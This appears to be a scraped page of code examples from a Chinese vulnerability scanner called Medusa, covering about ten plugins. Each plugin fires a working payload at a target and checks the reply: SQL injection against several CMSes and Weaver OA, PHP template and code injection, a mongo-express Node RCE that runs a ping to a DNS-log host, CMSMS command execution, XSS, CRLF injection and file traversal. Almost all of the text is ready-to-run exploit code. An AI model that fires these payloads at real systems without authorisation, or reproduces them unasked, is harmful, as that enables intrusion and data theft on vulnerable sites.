    ua = ClassCongregation.UserAgentS(Values)  #传入用户输入用户指定的浏览器头
    RandomAgent = ua.UserAgent()  #获取生成的头文件
    try:
        Medusa = Cms.Opensns.Opensns_index_getshell.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
        #print("[-]NginxDirectoryTraversalVulnerability Scan error")
    try:
        Medusa = Cms.Opensns.Opensns_index_arearank.medusa(
            Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except:
        pass
Exemplo n.º 21
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        header = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        req = request.Request(
            payload_url,
            headers=header,
        )
        response = request.urlopen(req)
        con = response.read().decode('utf8')  # 如果编码报错,去除HTTP Header中的gzip参数即可
        code = response.getcode()
        if code == 200 and con.find('System') != -1 and con.find(
                'Build Date') != -1 and con.find(
                    'Compiler') != -1 and con.find('PHP Version') != -1:
            Medusa = "{} 存在PbootCMS命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 22
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':
        'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }

    try:
        resp = requests.get(PayloadUrl,
                            headers=headers,
                            timeout=5,
                            proxies=proxies,
                            allow_redirects=False)

        con = resp.headers.get('Set-Cookie')
        code = resp.status_code
        if code == 302 and con.lower().find('a=1') != -1:
            Medusa = "{} 存在Nginx_CRLF注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 23
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:

        payload = '/main.php?m=company&s=admin/business_info_list'
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        data = "del[]=1) or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23&updateID=11&cc=6750"
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPost数据:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, data, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 24
0
def medusa(**kwargs) -> None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
        payload_url = url + payload

        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers[
            'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        s = requests.session()
        resp = s.post(payload_url,
                      data={
                          'formids':
                          '11111111111)))' + '\x0a\x0d' * 360 +
                          'union select NULL,instance_name from '
                          'v$instance order by (((1'
                      },
                      headers=Headers,
                      timeout=6,
                      proxies=proxies,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.lower(
        ).find('''"draggable":''') != -1 and con.lower(
        ).find('''"checked":''') != -1 and con.lower().find(
                '''"id":''') != -1 and con.lower().find('''"text":''') != -1:
            Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
                url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 +
                'union select NULL,instance_name from '
                'v$instance order by (((1')
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 25
0
def medusa(Url,RandomAgent,ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    domain_name = ".".join(url.split(".")[1:])
    payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
    Payloads = [payloadurl,payloadurl2]
    Medusas = []  # 存放返回数据

    for payload_url in Payloads:
        try:
            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 :
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
                _t=VulnerabilityInfo(Medusa)
                web=ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
                ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果

        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

    if len(Medusas) != 0:
        result = ""
        for i in Medusas:
            result = result + i + "\n"
        return (str(result))
Exemplo n.º 26
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(
            RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(
                '<script>alert({})</script>'.format(RD)) != -1:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 27
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        true_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=52"
        false_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=53"
        payload_url = scheme + "://" + url + ":" + str(port) + true_payload
        payload_url2 = scheme + "://" + url + ":" + str(port) + false_payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        code2 = resp2.status_code
        if code == 200 and code2 == 200 and con.find(
                'url="wap-jobs-show.php?id=1"') != -1 and con2.find(
                    'url="wap-jobs-show.php?id=1"') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 28
0
def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Content-Length": "115",
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('''{"response":"Success","details":"}''') != -1:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 29
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/checkValid"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        dns = Dnslog()
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
            dns.dns_host())

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Authorization': 'Basic YWRtaW46cGFzcw==',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '123'
        }
        s = requests.session()
        s.post(payload_url,
               data=data,
               headers=headers,
               timeout=6,
               verify=False)
        time.sleep(10)
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
                url, payload_url, data)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 30
0
def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/5clib/kindaction.action"
        data = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      proxies=proxies,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('system.ini') != -1:
            Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名